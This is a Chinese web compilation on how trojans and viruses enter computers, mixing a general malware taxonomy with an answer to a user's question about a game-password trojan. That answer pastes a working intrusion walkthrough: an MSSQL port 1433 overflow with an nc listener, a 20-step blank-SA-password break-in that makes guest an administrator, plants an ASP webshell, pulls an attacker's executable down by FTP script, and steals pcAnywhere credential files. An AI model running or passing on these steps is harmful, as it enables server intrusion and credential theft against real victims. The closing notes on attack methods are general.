木马病毒怎么侵入电脑系统(木马病毒怎样盗取个人信息)
本文目录一览:
电脑病毒是如何进入电脑的?
恶性程序码的类别中,电脑病毒和蠕虫是较具破坏力,因为它们有复制的能力,从而能够感染远方的系统。电脑病毒一般可以分成下列各类:
引导区电脑病毒
文件型电脑病毒
复合型电脑病毒
宏病毒
特洛伊/特洛伊木马
蠕虫
其他电脑病毒/恶性程序码的种类和制作技巧
引导区电脑病毒
90年代中期,最为流行的电脑病毒是引导区病毒,主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘,而且也能够感染用户硬盘内的主引导区(MBR)。一但电脑中毒,每一个经受感染电脑读取过的软盘都会受到感染。
引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。
典型例子:
Michelangelo是一种引导区病毒。它会感染引导区内的磁盘及硬盘内的MBR。当此电脑病毒常驻内存时,便会感染所有读取中及没有写入保护的磁盘。除此以外,Michelangelo会于3月6日当天删除受感染电脑内的所有文件。
文件型电脑病毒
文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。
典型例子:
CIH会感染Windows95/98的.EXE文件,并在每月的26号发作日进行严重破坏。于每月的26号当日,此电脑病毒会试图把一些随机资料覆写在系统的硬盘,令该硬盘无法读取原有资料。此外,这病毒又会试图破坏FlashBIOS内的资料。
复合型电脑病毒
复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。
宏病毒
与其他电脑病毒类型的分别是宏病毒是攻击数据文件而不是程序文件。
宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。
典型例子:
JulyKiller这个电脑病毒通过VB宏在MSWord97文件中传播。一但打开染毒文件,这病毒首先感染共用范本(normal.dot),从而导致其它被打开的文件一一遭到感染。此电脑病毒的破坏力严重。如果当月份是7月时,这病毒就会删除c:\的所有文件。
特洛伊/特洛伊木马
特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。
典型例子:
BackOrifice特洛伊木马于1998年发现,是一个Windows远程管理工具,让用户利用简单控制台或视窗应用程序,透过TCP/IP去远程遥控电脑。
蠕虫
蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件予多个用户。有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。
典型例子:
于1999年6月发现的Worm.ExploreZip是一个可复制自己的蠕虫。当执行时,它会把自己隐藏在附件,经电子邮件传送予通讯录内的收件人。在Windows环境下,若用户开启附件,就会自动执行蠕虫。在Windows95/98环境下,此蠕虫以Explore.exe为名,把自己复制到C:\windows\system目录,以及更改WIN.INI文件,以便系统每次启动时便会自动执行蠕虫。
管理工具,让用户利用简单控制台或视窗应用程序,透过TCP/IP去远程遥控电脑。
其他病毒/恶性程序码的种类和制作技巧
电脑病毒及防毒科技不断变更。因应用户转移至新的平台或新的科技,电脑病毒编写者会试图研制及传播新的电脑病毒。例如,在Java及LotusNotes平台上的电脑病毒已在近几年出现,其中首只Java病毒(Java.StrangeBrew)是在一九九八年九月上被发现的。所以,我们不应对于有关电脑病毒将会侵占新的电脑平台的报导,例如Macromedia、个人PDA、流动仪器或.NET等等而感到惊讶。
以下是现今电脑病毒普遍所采用的技巧:
ActiveContent
VBScript病毒
对于电脑病毒的发展,以下有一于趋势预计:
与软件上的保安漏洞更多结合
采用多种途径去散播
可感染多种不同的电脑平台
其实,以上所提出的预测己经发现在现今一些先进的电脑病毒中。例如在Nimda中,它会使用IIS和IE的保安漏洞去感染服务器和工作站。Nimda这种复杂的电脑病毒还采用多种途径去散播,其中包括电子邮件、网络上的共用资源、由CodeRedII所留下的后门、和通过浏览已感染了Nimda的服务器上的网页。此外,可以同时感染Windows和Linux的电脑病毒,已经在2001年被首次发现。
在启动项里咯,一些.DLL .com .exe 文件
一是看启动项和任务进程
用杀毒软件和一些流氓软件清理工具(比方:windows清理助手等)来查杀,别一个就是看注册表了
盗传奇密码的木马病毒是怎么侵入电脑的?
分类: 电脑/网络 反病毒
问题描述:
我用江民杀毒 时时监控 打开了放火墙
用专门杀这病毒的软件也杀了不少!
可每次还是会侵入电脑,是什么途径进入电脑的?
怎么彻底杀完?
最关键的是怎么才能防止它侵入我电脑?
就因为这病毒我都从做过2次系统了!
病毒一出现征兆就是我的电脑的声卡驱动就失灵了
帮帮忙啊!高手
解析:
可以通过1433和3389的端口,请关闭他们.还有可能你中了免杀的远程控制工具.1433这样入侵
在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exesandflee都有下载。进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:pinxxxxx就可以看到了。自己的ip呢?在cmd下c:ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。 user guest /active:yes用这个命令,就将默认禁止的guest用户激活。 user guest 123456这样guest的密码变成123456了。 localgroup administrators guest /add这就是guest成为最高权限的管理员了。
第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东sandflee也有下。看看入侵方法,我以前在小榕论坛贴的:lcx的win98下sa空密码入侵脚本20步
1.如何找到sa空密码肉鸡?自己用流光扫吧。
2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。
3.工具:supersqlexec.exe、cmd.asp(sandflee有下)海阳顶端网木马(黑白)放在本机f:盘
4.用supersqlexec联接成功。在命令行中输入:
user guest /active:yes
(指肉鸡回显下同)The mand pleted successfully.
user guest 123456
The mand pleted successfully
localgroup administrators guest /add
The mand pleted successfully.
这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。
5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以,是这样的,看这里)。
6.换个用户名吧。回到supersqlexe.exe的命令模式 user lcx 123456 /add,命令失败。服务器没开 ipc$?
7.回到sqlexe命令行中 start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思 不得其解。(注: start命令列表) 我后来换wn2000的cmd下 use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。
8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip
9.回到sqlexe命令行中 use x: \\本机ip\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器 显示命令成功完成。(lcx注:命令的详细用法)
10.sqlexe命令行中运行set得知其主页位置在d:\ipub\root。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir */s查找其主页位置。
11.sqlexe命令行中copy x:\cmd.asp d:\ipub\root,这个目录是肉鸡网站的目录。
12.回到ie中服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。
md d:\ipub\root\aspmm
13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\ipub\root\aspmm\.再将目录隐藏
attrib +h d:\ipub\root\aspmm
14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来 copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。
15.在自己本机上建立up.txt内容如下:
open ftp1.go.163(说明:这里是指我用得是网易ftp)
username(说明:你的上传用户名)
password(说明:密码)
get lcx.exe(说明:你要上传到肉鸡的文件名)
bye(说明:退出ftp)
通过映射copy到肉鸡的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\winnt\system32\下了。
17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节
18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?
19.通过一天的dos8.3规则的补习才知应是这样 :
copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\ipub\root\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.我这儿写了一个。我放在这里了。说明:
s8s8/cgi-bin/topic.cgi?forum=26topic=741
20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。
其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.
echo 你要写的 up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行。还有3389,他可以远程查看你的桌面.china/neork/2/2005/close-port-11325344601870.s
你还要看看一些可疑进程.
黑客是怎么入侵别人电脑的?
1、通过端口入侵
上次的勒索病毒,很多的人中招就是因为电脑默认开启了443端口。黑客可以通过扫描目标主机开放了哪些端口,然后通过这些端口就可以入侵你的主机了。
2、通过诱导用户下载事先写好的木马病毒
不同的木马有不同的入侵方法,但是黑客就是有办法利用人性的弱点,诱惑你去下载某些“小便宜”,庵后通过木马程序来控制你的主机。
3、通过网站入侵
如果黑客的目标主机是一台网络服务器,ta可以通过找上传漏洞,然后传木马上去。如果没有上传漏洞,那就找SQL注入,进入后台,上传木马,提取,控制目标服务器。
